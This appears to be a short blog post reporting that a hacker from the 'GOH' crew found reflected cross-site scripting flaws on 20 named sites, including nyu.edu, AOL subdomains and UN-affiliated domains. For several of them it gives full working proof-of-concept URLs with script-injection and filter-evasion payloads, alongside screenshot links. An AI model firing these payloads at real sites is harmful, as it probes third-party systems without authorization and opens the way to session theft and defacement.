XSS vulnerability found in 20 high-profile sites by GOH group
An Indian ethical hacker named Akshay, AKA 0z0n3, belonging to the hacking crew called GOH (godofhackers), has found 20 high-profile sites vulnerable to non-persistent XSS attacks.
The list of vulnerable sites with their screenshots:
1. nyu.edu - vuln link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png
2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png - status - patched
3. pakistanstockexchange.com - vuln link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E - snap - http://i49.tinypic.com/16huvi9.png
4. lilwaynehq.com - official site of Lil Wayne - vuln link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i50.tinypic.com/zugubs.png
5. mercury-pc.com - vuln link - http://www.mercury-pc.com/search.php - snap - http://i48.tinypic.com/b624qa.png
6. transcend.com - vuln link - http://www.transcend-info.com/Support/Search/index.asp - snap - http://i47.tinypic.com/28letjc.png
7. bangladeshtradeinfo.com - vuln link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E - snap - http://i49.tinypic.com/dzc68.png
8. defense.aol.com - vuln link - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/6fpgeq.png
9. gov.aol.com - vuln link - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i47.tinypic.com/f0n59x.png
10. http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png
11. http://www.un.org.au - http://i44.tinypic.com/critx.jpg
12. http://unfccc.int - http://i40.tinypic.com/e0qrdf.png
13. http://search2.unaids.org - http://i43.tinypic.com/4gruww.png
14. http://unu.edu - http://i39.tinypic.com/v8odw9.png
15. http://www.unpri.org - http://i41.tinypic.com/20pegsj.png
16. http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png
17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg
18. http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png
19. http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png
20. www.games.com - AOL subdomain - http://i47.tinypic.com/33z9v8m.png